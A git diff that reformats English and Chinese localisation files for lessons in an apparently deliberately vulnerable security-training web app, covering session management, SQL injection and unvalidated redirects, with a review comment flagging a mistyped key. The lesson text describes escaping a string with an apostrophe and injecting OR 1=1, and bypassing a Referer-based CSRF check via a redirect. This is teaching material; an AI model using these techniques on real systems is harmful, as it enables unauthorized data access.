-generic.error=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF:
+title.question.session_manage = \u4EC0\u4E48\u662F\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406?
+
+paragraph.info.1 = \u5BF9\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u653B\u51FB\u53EF\u4EE5\u88AB\u6267\u884C,\u901A\u8FC7\u4F7F\u7528\u90A3\u4E9B\u5176\u4ED6\u6F0F\u6D1E\u663E\u793A\u7684\u5B89\u5168\u98CE\u9669.\u6BD4\u5982\u8BF4,\u4EFB\u4F55\u5E94\u7528\u7A0B\u5E8F\u7684\u4F1A\u8BDD\u7BA1\u7406\u53EF\u4EE5\u5728\u4E00\u4E2A\u8DE8\u7AD9\u811A\u672C\u653B\u51FB\u6F0F\u6D1E\u88AB\u7528\u4E8E\u7A83\u53D6\u7528\u6237\u7684\u4F1A\u8BDDToken\u88AB\u514B\u670D.\u8BE5\u4E3B\u9898\u66F4\u591A\u7684\u5173\u4E8E\u7F3A\u9677\u662F\u5B58\u5728\u4E8E\u5E94\u7528\u7A0B\u5E8F\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u6A21\u5F0F.
+paragraph.info.2 = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u7F3A\u9677\u901A\u5E38\u88AB\u53D1\u73B0\u5728\u529F\u80FD\u4E0A,\u5982\u6CE8\u9500,\u5BC6\u7801\u7BA1\u7406,\u5BC6\u7801\u63D0\u793A\u95EE\u9898\u548C\u5E10\u6237\u66F4\u65B0.\u4E00\u4E2A\u653B\u51FB\u53EF\u4EE5\u901A\u8FC7\u731C\u6D4B\u4ED6\u4EEC\u7684\u5BC6\u7801\u63D0\u793A\u95EE\u9898\u6216\u901A\u8FC7\u53C2\u6570\u6EE5\u7528,\u53EF\u80FD\u6EE5\u7528\u8FD9\u4E9B\u529F\u80FD\u53BB\u4FEE\u6539\u5176\u4ED6\u7528\u6237\u51ED\u8BC1.\u6709\u65F6\u4FAF\u8981\u627E\u51FA\u8FD9\u4E9B\u7F3A\u9677\u662F\u6BD4\u8F83\u56F0\u96BE\u7684,\u56E0\u4E3A\u6BCF\u4E00\u4E2A\u5B9E\u73B0\u90FD\u662F\u552F\u4E00\u7684.
+paragraph.info.3 = \u4EE5\u4E0B\u51E0\u79CD\u60C5\u51B5\u5F88\u5BB9\u6613\u53D7\u5230\u8FD9\u4E9B\u5B89\u5168\u98CE\u9669;
+paragraph.info.number.1 = 1)
+paragraph.info.number.2 = 2)
+paragraph.info.number.3 = 3)
+paragraph.info.number.4 = 4)
+paragraph.info.number.5 = 5)
+paragraph.info.1.1 = \u7528\u6237\u51ED\u8BC1\u4EE5\u4E0D\u5145\u5206\u7684 \u52A0\u5BC6\u6280\u672F\u6C34\u5E73\u50A8\u5B58.
+paragraph.info.2.2 = \u53EF\u4EE5\u901A\u8FC7\u5931\u6548\u7684\u5E10\u6237\u7BA1\u7406\u731C\u6D4B\u6216\u66F4\u6539\u7528\u6237\u51ED\u8BC1.
+paragraph.info.3.3 = \u4F1A\u8BDD\u6807\u8BC6\u7B26\u88AB\u66B4\u9732\u5728URL\u4E2D.
+paragraph.info.4.4 = \u8BE5\u5E94\u7528\u7A0B\u5E8F\u6CA1\u6709\u4F7F\u7528\u5145\u5206\u7684\u4F20\u8F93\u4FDD\u62A4(\u5982HTTPs\u6216sFTP)
+paragraph.info.5.5 = \u7528\u6237\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u7684\u529F\u80FD\u624B\u52A8\u66F4\u6539\u4F1A\u8BDD\u53C2\u6570.
+paragraph.info.6 = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u6F0F\u6D1E\u5141\u8BB8\u653B\u51FB\u8005\u53EF\u80FD\u635F\u5BB3\u6574\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684\u6BCF\u4E2A\u5E10\u6237.\u4E00\u65E6\u653B\u51FB\u88AB\u6267\u884C,\u653B\u51FB\u8005\u5C31\u62E5\u6709\u548C\u7528\u6237\u4E00\u6837\u7684\u6743\u9650.\u51FA\u4E8E\u8FD9\u4E2A\u539F\u56E0\uFF0C\u7279\u6743\u5E10\u6237\u6210\u4E3A\u653B\u51FB\u76EE\u6807,\u5982\u7BA1\u7406\u5458.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u8BE5\u8BFE\u7A0B\u91C7\u7528\u4E86\u4E0D\u597D\u7684\u4F1A\u8BDD\u7BA1\u7406,\u8C03\u67E5\u5982\u4E0B\u529F\u80FD\u6765\u67E5\u770B\u4F60\u662F\u5426\u53EF\u4EE5\u6B3A\u9A97\u670D\u52A1\u5668,\u8BA9\u670D\u52A1\u5668\u8BA4\u4E3A\u4F60\u5DF2\u7ECF\u5B8C\u6210\u8BE5\u8BFE\u7A0B\u5E76\u53EF\u4EE5\u83B7\u5F97\u94A5\u5319.
+hint.title = \u8BFE\u7A0B\u63D0\u793A
+lesson.hint.1 = \u8BE5\u8BFE\u7A0B\u5B58\u50A8\u672A\u52A0\u5BC6\u7684\u4F1A\u8BDD\u4FE1\u606F\u5728\u4E00\u4E2A\u7528\u6237Cookie\u4E2D.
+complete.button = \u5B8C\u6210\u8BE5\u8BFE\u7A0B
+word.info.loading = \u8BF7\u68A2\u4FAF...
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+generic.error = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF:
diff --git a/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.properties b/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.properties
index 7613f8d42..fdee4223a 100644
--- a/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.properties
+++ b/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.properties
@@ -1,15 +1,21 @@
-title.question.sql_injection=SQL Injection Lesson
-paragraph.info.1=Injection flaws, such as SQL injection, occur when hostile data is sent to an interpreter as part of a command or query. The hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. Injections attacks are of a high severity. Injection flaws can be exploited to remove a system's confidentiality by accessing any information held on the system. These security risks can then be extended to execute updates to existing data affecting the systems integrity and availability. These attacks are easily exploitable as they can be initiated by anyone who can interact with the system through any data they pass to the application.
-paragraph.info.2=The following form's parameters are concatenated to a string that will be passed to a SQL server. This means that the data can be interpreted as part of the code.
-paragraph.info.3=The objective here is to modify the result of the query with SQL Injection so that all of the table's rows are returned. This means you want to change the boolean result of the query's WHERE clause to return true for every row in the table. The easiest way to ensure the boolean result is always true is to inject a boolean 'OR' operator followed by a true statement like 1 = 1.
-paragraph.info.4=If the parameter is been interpreted as a string, you can escape the string with an apostrophe. That means that everything after the apostrophe will be interpreted as SQL code.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=Exploit the SQL Injection flaw in the following example to retrieve all of the rows in the table. The lesson's solution key will be found in one of these rows! The results will be posted beneath the search form.
-hint.title=Lesson Hint
-lesson.hint.1=This is the query that you are adding data to. See if you can input something that will cause the WHERE clause to return true for every row in the table. Remember, you can escape a string using an apostrophe.
-enter.user.name=Please enter the user name of the user that you want to look up
-get.user.button=Get this user
-word.info.loading=Loading...
-sign.hint=Would you link a hint?
-generic.error=An Error Occurred:
\ No newline at end of file
+title.question.sql_injection = SQL Injection Lesson
+
+paragraph.info.1 = Injection flaws, such as SQL injection, occur when hostile data is sent to an interpreter as part of a command or query. The hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. Injections attacks are of a high severity. Injection flaws can be exploited to remove a system's confidentiality by accessing any information held on the system. These security risks can then be extended to execute updates to existing data affecting the systems integrity and availability. These attacks are easily exploitable as they can be initiated by anyone who can interact with the system through any data they pass to the application.
+paragraph.info.2 = The following form's parameters are concatenated to a string that will be passed to a SQL server. This means that the data can be interpreted as part of the code.
+paragraph.info.3 = The objective here is to modify the result of the query with SQL Injection so that all of the table's rows are returned. This means you want to change the boolean result of the query's WHERE clause to return true for every row in the table. The easiest way to ensure the boolean result is always true is to inject a boolean 'OR' operator followed by a true statement like 1 = 1.
+paragraph.info.4 = If the parameter is been interpreted as a string, you can escape the string with an apostrophe. That means that everything after the apostrophe will be interpreted as SQL code.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = Exploit the SQL Injection flaw in the following example to retrieve all of the rows in the table. The lesson's solution key will be found in one of these rows! The results will be posted beneath the search form.
+
+hint.title = Lesson Hint
+lesson.hint.1 = This is the query that you are adding data to. See if you can input something that will cause the WHERE clause to return true for every row in the table. Remember, you can escape a string using an apostrophe.
+enter.user.name = Please enter the user name of the user that you want to look up
+get.user.button = Get this user
+
+
+word.info.loading = Loading...
+sign.hint = Would you link a hint?
+generic.error = An Error Occurred:
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594_zh.properties b/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594_zh.properties
index a9b7dbf8b..ec9f3d482 100644
--- a/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594_zh.properties
+++ b/src/main/resources/i18n/lessons/sql_injection/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594_zh.properties
@@ -1,15 +1,21 @@
-title.question.sql_injection=SQL \u6CE8\u5165
-paragraph.info.1=\u6CE8\u5165\u7F3A\u9677,\u5982 SQL\u6CE8\u5165,\u53D1\u751F\u5728\u5F53\u6076\u610F\u7684\u6570\u636E\u88AB\u4F5C\u4E3A\u547D\u4EE4\u6216\u67E5\u8BE2\u7684\u4E00\u90E8\u5206\u53D1\u9001\u65F6. \u8BE5\u6076\u610F\u7684\u6570\u636E\u53EF\u4EE5\u6B3A\u9A97\u7FFB\u8BD1\u5668\u4EE5\u6267\u884C\u610F\u5916\u547D\u4EE4\u6216\u8BBF\u95EE\u672A\u7ECF\u6388\u6743\u7684\u6570\u636E.\u6CE8\u5165\u653B\u51FB\u7684\u4E25\u91CD\u6027\u975E\u5E38\u9AD8.\u6CE8\u5165\u7F3A\u9677\u53EF\u4EE5\u88AB\u5229\u7528\u901A\u8FC7\u8BBF\u95EE\u7CFB\u7EDF\u4E0A\u7684\u4EFB\u4F55\u4FE1\u606F\u6765\u6D88\u9664\u7CFB\u7EDF\u7684\u4FDD\u5BC6\u6027.\u8FD9\u4E9B\u5B89\u5168\u98CE\u9669\u53EF\u4EE5\u88AB\u6269\u5C55\u5230\u6267\u884C\u66F4\u65B0\u5230\u73B0\u6709\u7684\u6570\u636E\uFF0C\u5F71\u54CD\u7CFB\u7EDF\u7684\u5B8C\u6574\u6027\u548C\u53EF\u7528\u6027.\u8FD9\u4E9B\u653B\u51FB\u662F\u5F88\u5BB9\u6613\u88AB\u5229\u7528\u7684,\u56E0\u4E3A\u5B83\u4EEC\u53EF\u4EE5\u88AB\u8D77\u7528,\u5F53\u4EFB\u4F55\u4EBA\u53EF\u4EE5\u901A\u8FC7\u4ED6\u4EEC\u4ECE\u5E94\u7528\u7A0B\u5E8F\u4F20\u8F93\u7684\u4EFB\u4F55\u6570\u636E\u4E0E\u7CFB\u7EDF\u4EA4\u4E92.
-paragraph.info.2=\u4E0B\u9762\u7684\u8868\u683C\u7684\u53C2\u6570\u4F1A\u88AB\u4E32\u8054\u4E3A\u4E00\u4E2A\u5B57\u7B26\u4E32,\u5C06\u88AB\u4F20\u9001\u5230\u4E00\u4E2ASQL\u670D\u52A1\u5668.\u8FD9\u610F\u5473\u7740\u8BE5\u6570\u636E\u53EF\u4EE5\u88AB\u4F5C\u4E3A\u4EE3\u7801\u7684\u4E00\u90E8\u5206\u5904\u7406.
-paragraph.info.3=\u8FD9\u91CC\u7684\u76EE\u6807\u662F\u7528SQL\u6CE8\u5165\u4FEE\u6539\u67E5\u8BE2\u7684\u7ED3\u679C,\u4F7F\u5F97\u8868\u4E2D\u6240\u6709\u7684\u884C\u90FD\u8FD4\u56DE.\u8FD9\u610F\u5473\u7740\u4F60\u60F3\u6539\u53D8\u67E5\u8BE2\u7684WHERE\u5B50\u53E5\u8FD4\u56DE\u7684\u5E03\u5C14\u503C\u7684\u7ED3\u679C,\u4F7F\u5176\u4E3A\u771F\u503C\u53EF\u4EE5\u8FD4\u56DE\u8868\u4E2D\u7684\u6BCF\u4E00\u5217.\u6700\u7B80\u5355\u7684\u786E\u4FDD\u5E03\u5C14\u503C\u4E00\u76F4\u4E3A\u771F\u7684\u65B9\u5F0F\u662F\u6CE8\u5165\u4E00\u4E2A\u5E03\u5C14\u503C 'OR'\u64CD\u4F5C\u7B26\u968F\u540E\u662F\u50CF1=1\u7684\u4E00\u4E2A\u771F\u7684\u9648\u8FF0.
-paragraph.info.4=\u5982\u679C\u8BE5\u53C2\u6570\u88AB\u89E3\u91CA\u4E3A\u4E00\u4E2A\u5B57\u7B26\u4E32\uFF0C\u4F60\u4FBF\u53EF\u4EE5\u4F7F\u7528\u5355\u5F15\u53F7\u9003\u8131\u5B57\u7B26\u4E32. \u8FD9\u610F\u5473\u7740\u6240\u4EE5\u4EE5\u6487\u53F7\u7ED3\u5C3E\u7684\u90FD\u5C06\u88AB\u89E3\u91CA\u4E3ASQL\u4EE3\u7801.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u5229\u7528 SQL\u6CE8\u5165\u6F0F\u6D1E\u5728\u4E0B\u9762\u7684\u4F8B\u5B50\u4E2D\u68C0\u7D22\u8868\u4E2D\u6240\u6709\u7684\u884C.\u8BE5\u8BFE\u7A0B\u7684\u5173\u952E\u94A5\u5319\u53EF\u4EE5\u5728\u5176\u4E2D\u7684\u67D0\u4E00\u884C\u627E\u5230!\u5176\u7ED3\u679C\u5C06\u4F1A\u516C\u5E03\u5728\u641C\u7D22\u8868\u4E0B\u65B9.
-hint.title=\u8BFE\u7A0B\u63D0\u793A
-lesson.hint.1=\u4F60\u9700\u8981\u6DFB\u52A0\u6570\u636E\u5230\u8BE5\u67E5\u8BE2\u8BED\u53E5.\u770B\u770B\u4F60\u7684\u8F93\u5165\u662F\u4E0D\u662F\u4F1A\u5BFC\u81F4 WHERE\u5B50\u53E5\u8FD4\u56DE\u4E00\u4E2A\u771F\u503C\u5BF9\u8868\u4E2D\u7684\u6BCF\u4E00\u884C.\u8BF7\u8BB0\u4F4F\uFF0C\u4F60\u53EF\u4EE5\u4F7F\u7528\u4E00\u4E2A\u5355\u5F15\u53F7\u9003\u8131\u7684\u5B57\u7B26\u4E32.
-Tenter.user.name=\u8BF7\u8F93\u5165\u4F60\u60F3\u67E5\u770B\u7684\u7528\u6237\u7684\u7528\u6237\u540D
-get.user.button=\u83B7\u53D6\u8BE5\u7528\u6237
-word.info.loading=\u52A0\u8F7D\u4E2D...
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-generic.error=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF:
\ No newline at end of file
+title.question.sql_injection = SQL \u6CE8\u5165
+
+paragraph.info.1 = \u6CE8\u5165\u7F3A\u9677,\u5982 SQL\u6CE8\u5165,\u53D1\u751F\u5728\u5F53\u6076\u610F\u7684\u6570\u636E\u88AB\u4F5C\u4E3A\u547D\u4EE4\u6216\u67E5\u8BE2\u7684\u4E00\u90E8\u5206\u53D1\u9001\u65F6. \u8BE5\u6076\u610F\u7684\u6570\u636E\u53EF\u4EE5\u6B3A\u9A97\u7FFB\u8BD1\u5668\u4EE5\u6267\u884C\u610F\u5916\u547D\u4EE4\u6216\u8BBF\u95EE\u672A\u7ECF\u6388\u6743\u7684\u6570\u636E.\u6CE8\u5165\u653B\u51FB\u7684\u4E25\u91CD\u6027\u975E\u5E38\u9AD8.\u6CE8\u5165\u7F3A\u9677\u53EF\u4EE5\u88AB\u5229\u7528\u901A\u8FC7\u8BBF\u95EE\u7CFB\u7EDF\u4E0A\u7684\u4EFB\u4F55\u4FE1\u606F\u6765\u6D88\u9664\u7CFB\u7EDF\u7684\u4FDD\u5BC6\u6027.\u8FD9\u4E9B\u5B89\u5168\u98CE\u9669\u53EF\u4EE5\u88AB\u6269\u5C55\u5230\u6267\u884C\u66F4\u65B0\u5230\u73B0\u6709\u7684\u6570\u636E\uFF0C\u5F71\u54CD\u7CFB\u7EDF\u7684\u5B8C\u6574\u6027\u548C\u53EF\u7528\u6027.\u8FD9\u4E9B\u653B\u51FB\u662F\u5F88\u5BB9\u6613\u88AB\u5229\u7528\u7684,\u56E0\u4E3A\u5B83\u4EEC\u53EF\u4EE5\u88AB\u8D77\u7528,\u5F53\u4EFB\u4F55\u4EBA\u53EF\u4EE5\u901A\u8FC7\u4ED6\u4EEC\u4ECE\u5E94\u7528\u7A0B\u5E8F\u4F20\u8F93\u7684\u4EFB\u4F55\u6570\u636E\u4E0E\u7CFB\u7EDF\u4EA4\u4E92.
+paragraph.info.2 = \u4E0B\u9762\u7684\u8868\u683C\u7684\u53C2\u6570\u4F1A\u88AB\u4E32\u8054\u4E3A\u4E00\u4E2A\u5B57\u7B26\u4E32,\u5C06\u88AB\u4F20\u9001\u5230\u4E00\u4E2ASQL\u670D\u52A1\u5668.\u8FD9\u610F\u5473\u7740\u8BE5\u6570\u636E\u53EF\u4EE5\u88AB\u4F5C\u4E3A\u4EE3\u7801\u7684\u4E00\u90E8\u5206\u5904\u7406.
+paragraph.info.3 = \u8FD9\u91CC\u7684\u76EE\u6807\u662F\u7528SQL\u6CE8\u5165\u4FEE\u6539\u67E5\u8BE2\u7684\u7ED3\u679C,\u4F7F\u5F97\u8868\u4E2D\u6240\u6709\u7684\u884C\u90FD\u8FD4\u56DE.\u8FD9\u610F\u5473\u7740\u4F60\u60F3\u6539\u53D8\u67E5\u8BE2\u7684WHERE\u5B50\u53E5\u8FD4\u56DE\u7684\u5E03\u5C14\u503C\u7684\u7ED3\u679C,\u4F7F\u5176\u4E3A\u771F\u503C\u53EF\u4EE5\u8FD4\u56DE\u8868\u4E2D\u7684\u6BCF\u4E00\u5217.\u6700\u7B80\u5355\u7684\u786E\u4FDD\u5E03\u5C14\u503C\u4E00\u76F4\u4E3A\u771F\u7684\u65B9\u5F0F\u662F\u6CE8\u5165\u4E00\u4E2A\u5E03\u5C14\u503C 'OR'\u64CD\u4F5C\u7B26\u968F\u540E\u662F\u50CF1=1\u7684\u4E00\u4E2A\u771F\u7684\u9648\u8FF0.
+paragraph.info.4 = \u5982\u679C\u8BE5\u53C2\u6570\u88AB\u89E3\u91CA\u4E3A\u4E00\u4E2A\u5B57\u7B26\u4E32\uFF0C\u4F60\u4FBF\u53EF\u4EE5\u4F7F\u7528\u5355\u5F15\u53F7\u9003\u8131\u5B57\u7B26\u4E32. \u8FD9\u610F\u5473\u7740\u6240\u4EE5\u4EE5\u6487\u53F7\u7ED3\u5C3E\u7684\u90FD\u5C06\u88AB\u89E3\u91CA\u4E3ASQL\u4EE3\u7801.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u5229\u7528 SQL\u6CE8\u5165\u6F0F\u6D1E\u5728\u4E0B\u9762\u7684\u4F8B\u5B50\u4E2D\u68C0\u7D22\u8868\u4E2D\u6240\u6709\u7684\u884C.\u8BE5\u8BFE\u7A0B\u7684\u5173\u952E\u94A5\u5319\u53EF\u4EE5\u5728\u5176\u4E2D\u7684\u67D0\u4E00\u884C\u627E\u5230!\u5176\u7ED3\u679C\u5C06\u4F1A\u516C\u5E03\u5728\u641C\u7D22\u8868\u4E0B\u65B9.
+
+hint.title = \u8BFE\u7A0B\u63D0\u793A
+lesson.hint.1 = \u4F60\u9700\u8981\u6DFB\u52A0\u6570\u636E\u5230\u8BE5\u67E5\u8BE2\u8BED\u53E5.\u770B\u770B\u4F60\u7684\u8F93\u5165\u662F\u4E0D\u662F\u4F1A\u5BFC\u81F4 WHERE\u5B50\u53E5\u8FD4\u56DE\u4E00\u4E2A\u771F\u503C\u5BF9\u8868\u4E2D\u7684\u6BCF\u4E00\u884C.\u8BF7\u8BB0\u4F4F\uFF0C\u4F60\u53EF\u4EE5\u4F7F\u7528\u4E00\u4E2A\u5355\u5F15\u53F7\u9003\u8131\u7684\u5B57\u7B26\u4E32.
+Tenter.user.name = \u8BF7\u8F93\u5165\u4F60\u60F3\u67E5\u770B\u7684\u7528\u6237\u7684\u7528\u6237\u540D
+get.user.button = \u83B7\u53D6\u8BE5\u7528\u6237
+
+
+word.info.loading = \u52A0\u8F7D\u4E2D...
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+generic.error = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF:
\ No newline at end of file
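Review bot: The key `Tenter.user.name` on the new side of this hunk does not match `enter.user.name`, which is the key the base sql_injection bundle earlier in this diff defines for the same prompt. The reformat copies the stray leading `T` over unchanged from the removed line, so the Chinese text for this prompt is presumably never looked up and the lesson would fall back to the default-locale string. Since every line of the file is rewritten here anyway, rename the key to `enter.user.name` and keep the value as it is. A check that each `_zh` bundle has the same key set as its base bundle would catch this class of mismatch.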
diff --git a/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.properties b/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.properties
index 61a068106..0769a962c 100644
--- a/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.properties
+++ b/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.properties
@@ -1,15 +1,20 @@
-title.question.unvalidated_redirects_forwards=What are Unvalidated Redirects and Forwards?
-paragraph.info.1=Unvalidated redirects and forwards occur in applications that redirect or forward their users to a target that is specified by an unvalidated parameter. An unvalidated parameter that is used to redirect a user to a normally safe location can be used by an attacker to trick victims into visiting phishing pages or even have malware installed on their machines.
-paragraph.info.2=This attack takes advantage of a user's trust in an application. A victim is more likely to click on a link from a site that they trust than one they have never seen before.
-paragraph.info.3=These attacks can also be used to bypass access control schemes. This is done when a page that a user would not normally have access to,such as administrator pages, is included in a unvalidated redirect.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=To mark this lesson as complete, you must exploit this Cross Site Request Forgery vulnerability using an Unvalidated Redirect security risk. The CSRF protection that has been implemented in this function is insufficient and can be bypassed easily with an unvalidated redirect vulnerability. To protect against CSRF attacks the application is checking that the request's Referer HTTP header is from the same host name the application is running on. This is easily bypassed when the request originates from inside the application. When an unvalidated redirect is used, the Referer header will be the URL of the redirect page.
-challenge.description.function=The function vulnerable to unvalidated redirects is
-challenge.description.request=The request to mark this lesson as complete is
-challenge.description.request.2=where the exampleId is a users TempId.
-challenge.description.id=Your temporary ID is
-challenge.description.admin.message=The administrator promises to go to any URL you send him. So please use the following form to send him something of interest!
-send.message.button=Send Message
-word.info.loading=Loading...
-generic.error=An Error Occurred:
\ No newline at end of file
+title.question.unvalidated_redirects_forwards = What are Unvalidated Redirects and Forwards?
+
+paragraph.info.1 = Unvalidated redirects and forwards occur in applications that redirect or forward their users to a target that is specified by an unvalidated parameter. An unvalidated parameter that is used to redirect a user to a normally safe location can be used by an attacker to trick victims into visiting phishing pages or even have malware installed on their machines.
+paragraph.info.2 = This attack takes advantage of a user's trust in an application. A victim is more likely to click on a link from a site that they trust than one they have never seen before.
+paragraph.info.3 = These attacks can also be used to bypass access control schemes. This is done when a page that a user would not normally have access to,such as administrator pages, is included in a unvalidated redirect.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = To mark this lesson as complete, you must exploit this Cross Site Request Forgery vulnerability using an Unvalidated Redirect security risk. The CSRF protection that has been implemented in this function is insufficient and can be bypassed easily with an unvalidated redirect vulnerability. To protect against CSRF attacks the application is checking that the request's Referer HTTP header is from the same host name the application is running on. This is easily bypassed when the request originates from inside the application. When an unvalidated redirect is used, the Referer header will be the URL of the redirect page.
+challenge.description.function = The function vulnerable to unvalidated redirects is
+challenge.description.request = The request to mark this lesson as complete is
+challenge.description.request.2 = where the exampleId is a users TempId.
+challenge.description.id = Your temporary ID is
+challenge.description.admin.message = The administrator promises to go to any URL you send him. So please use the following form to send him something of interest!
+
+
+send.message.button = Send Message
+word.info.loading = Loading...
+generic.error = An Error Occurred:
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f_zh.properties b/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f_zh.properties
index 0a86f3fa9..9b2c248b8 100644
--- a/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f_zh.properties
+++ b/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f_zh.properties
@@ -1,15 +1,21 @@
-title.question.unvalidated_redirects_forwards=\u4EC0\u4E48\u662F\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1?
-paragraph.info.1=\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1,\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F\u91CD\u5B9A\u5411\u6216\u8F6C\u53D1\u4ED6\u4EEC\u7684\u7528\u6237\u5230\u4E00\u4E2A\u901A\u8FC7\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u53C2\u6570\u7279\u5B9A\u7684\u76EE\u6807.\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u53C2\u6570\u88AB\u7528\u4E8E\u91CD\u5B9A\u5411\u4E00\u4E2A\u7528\u6237\u5230\u4E00\u4E2A\u901A\u5E38\u5B89\u5168\u7684\u4F4D\u7F6E,\u8BE5\u4F4D\u7F6E\u662F\u53EF\u88AB\u653B\u51FB\u8005\u7528\u4E8E\u6B3A\u9A97\u53D7\u5BB3\u8005\u53BB\u8BBF\u95EE\u9493\u9C7C\u7F51\u9875\u6216\u6709\u6076\u610F\u8F6F\u4EF6\u5B89\u88C5\u5728\u4ED6\u4EEC\u7684\u673A\u5668\u4E0A\u7684.
-paragraph.info.2=\u8FD9\u79CD\u653B\u51FB\u5229\u7528\u7528\u6237\u5BF9\u5E94\u7528\u7A0B\u5E8F\u7684\u4FE1\u8D56. \u53D7\u5BB3\u8005\u66F4\u6709\u53EF\u80FD\u70B9\u51FB\u4E00\u4E2A\u4ED6\u4EEC\u4FE1\u8D56\u7684\u7AD9\u70B9,\u800C\u4E0D\u662F\u4E00\u4E2A\u4ED6\u4EEC\u4ECE\u672A\u89C1\u8FC7\u7684\u7AD9\u70B9\u7684\u94FE\u63A5.
-paragraph.info.3=\u8FD9\u4E9B\u653B\u51FB\u4E5F\u53EF\u4EE5\u88AB\u7528\u4E8E\u7ED5\u8FC7\u8BBF\u95EE\u63A7\u5236\u6A21\u5F0F.\u90A3\u4E9B\u666E\u901A\u7528\u6237\u901A\u5E38\u6CA1\u6709\u88AB\u6388\u6743\u8BBF\u95EE\u7684\u9875\u9762,\u6BD4\u5982\u7BA1\u7406\u5458\u9875\u9762,\u4E5F\u5DF2\u7ECF\u5B8C\u6210\u4E86\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
